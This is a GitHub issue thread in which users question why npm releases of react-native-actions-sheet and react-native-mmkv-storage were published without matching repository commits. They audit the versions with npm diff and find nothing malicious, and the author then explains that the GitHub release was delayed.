Security concerns with versions 0.9.4+ (USE WITH CAUTION)

[goguda]

I decided to open a separate issue for this following the discussion at #376 and the observations made by @divineniiquaye.

Basically, the concern arises from the code in this repository not being updated since version 0.9.3, and we're at version 0.9.6 on npm. Hence, code is being released on npm without being updated in this repository.

Just for peace of mind for those who have already upgraded, I had a look at the code in version 0.9.6 shipped by npm and I don't see anything too out of the ordinary. I also used npm diff between versions 0.9.3, 0.9.4, 0.9.5 and 0.9.6 and didn't find anything overly strange. I checked for both fetch calls as well as any weird react native calls that might modify something on the device, but I didn't see anything.

0.9.4 looks like it may have been a mistake, pretty much everything in the dist folder gets deleted. 0.9.5 fixes the mistake by restoring what's in dist and 0.9.6 looks like it completes the migration from FlatList to shopify's FlashList (which is what introduced the error in #376). These 3 versions were all released on the same day (11 days ago, so July 1st).

Anyone who's already upgraded should be safe, for now.

However, that having been said, I do still find this behaviour a bit alarming considering we're talking 3 revisions now where the code has not been updated on GitHub. There's nothing stopping the author from releasing a 0.9.7 version the same way with something malicious in it.

The way everything gets deleted in 0.9.4 is also a bit strange. Not the most alarming thing, but could be testing the waters for something bigger perhaps?

We're probably going to lock our package version on 0.9.3 and ween our app off of this package just to be safe. Everyone else should probably also take these measures.

I'm hoping @ammarahm-ed, the author of this package, can shed some light on this situation, but the fact they've been dormant on the repository for 3 months while still releasing versions to npm doesn't quite sit well with me.

[jonxssc]

You are totaly right its strange, that the npm package gets updated but the github repository doesnt although the author is active on his other repositorys

[goguda]

You are totaly right its strange, that the npm package gets updated but the github repository doesnt although the author is active on his other repositorys

Another good observation, he was active on GitHub as recently as yesterday...

[goguda]

I'm also noticing the same sort of behaviour in his other package, react-native-mmkv-storage. Latest version on GitHub is 0.9.0 but the version on npm is 0.9.1.

[divineniiquaye]

I'm also noticing the same sort of behaviour in his other package, react-native-mmkv-storage. Latest version on GitHub is 0.9.0 but the version on npm is 0.9.1.

Woah, this is not looking good. Am dropping react-native-mmkv-storage support from my state management implementation.

[goguda]

I'm also noticing the same sort of behaviour in his other package, react-native-mmkv-storage. Latest version on GitHub is 0.9.0 but the version on npm is 0.9.1.

Woah, this is not looking good. Am dropping react-native-mmkv-storage support from my state management implementation.

With react-native-mmkv-storage it looks to be the same sort of pattern, dist/ was deleted in 0.9.0 and re-added in 0.9.1.

[ShaunLWM]

0.9.7 published 5 hours ago :/

npm diff --diff=react-native-actions-sheet@0.9.6 --diff=react-native-actions-sheet@0.9.7

looks okay. seemed like this PR was merged and built https://github.com/ammarahm-ed/react-native-actions-sheet/pull/385

[ammarahm-ed]

Just published a release on github for v0.9.7.

And why there has been no release. I was caught up in some personal stuff and didn't get the time to finish the release. Docs etc are fully up to date though. Thanks.